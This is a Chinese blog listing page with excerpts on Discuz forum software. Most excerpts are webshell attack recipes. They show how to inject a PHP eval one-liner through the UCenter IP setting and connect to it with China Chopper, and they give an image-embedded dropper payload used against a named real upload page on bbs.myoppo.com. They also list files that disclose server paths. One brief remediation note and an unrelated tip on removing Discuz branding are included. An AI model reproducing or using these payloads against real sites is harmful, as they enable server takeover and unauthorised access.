• 首先你应该得到管理员的用户名和密码,若密码最好不过了,如果实在找不到找好去找一下老密。密码都得到了以后,进入后台,直接在UCenter IP 地址(站长--ucenter设置): 里面插入一句话  xxoo\\');eval($_POST[a])?>;// 就ok 然后菜刀连接http://www.xxoo.com/config/config_ucenter.php 密码a。 现在这个漏洞应该大部分的网站都不存在了。
    作者:熊猫| 发布:2014年2月21日| 阅读:3,390次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 上传地址:http://bbs.myoppo.com/bluesword/blue_sword.php?t=t_upload&Action=PostMsg 已使用解析拿下shell。 大马:<?fputs(fopen("x.php","w"),"<?eval(\$_POST[g]);?>")?> 只要把大马和一张图片合成后,上传,直接在后面加入1.php 自动生成x.php的木马。 修复方案: 1、设置php.ini的cgi.fix_pathinfo为0,重启php。最方便,但修改设置的影响需要自己评...
    作者:熊猫| 发布:2014年2月21日| 阅读:3,317次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 后台拿shell 需要有管理员帐号及密码,进入后台打开站长----ucenter设置,直接在UCenter IP 地址:里面插入一句话 xxoo\\');eval($_POST[a])?>;// 就ok ,然后菜刀连接 http://XXX.com/config/config_ucenter.php 密码a 爆路径文件如下: /uc_server/control/admin/db.php/source/plugin/myrepeats/ table/table_myrepeats.php/install/include/install_lang.php
    作者:熊猫| 发布:2014年1月22日| 阅读:6,406次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 一、标题中的版权 在原来的discuz X1版本中,标题中去掉“Powered by Discuz!”版权标识很容易,只需要修改模板文件的头部公用文件,将['bbname']- <!--{/if}--> Powered by Discuz!</title> 中红色部分去掉即可。 但是discuz X2、X3等直接把- Powered by Discuz!中的 - 放在了变量里,所以删除后,标题一句话结束后会有一个小 - 尾巴,对搜索引擎很不友好,所以...
    作者:熊猫| 发布:2013年12月31日| 阅读:2,440次| 分类:程序问题, 网站建设| 标签:,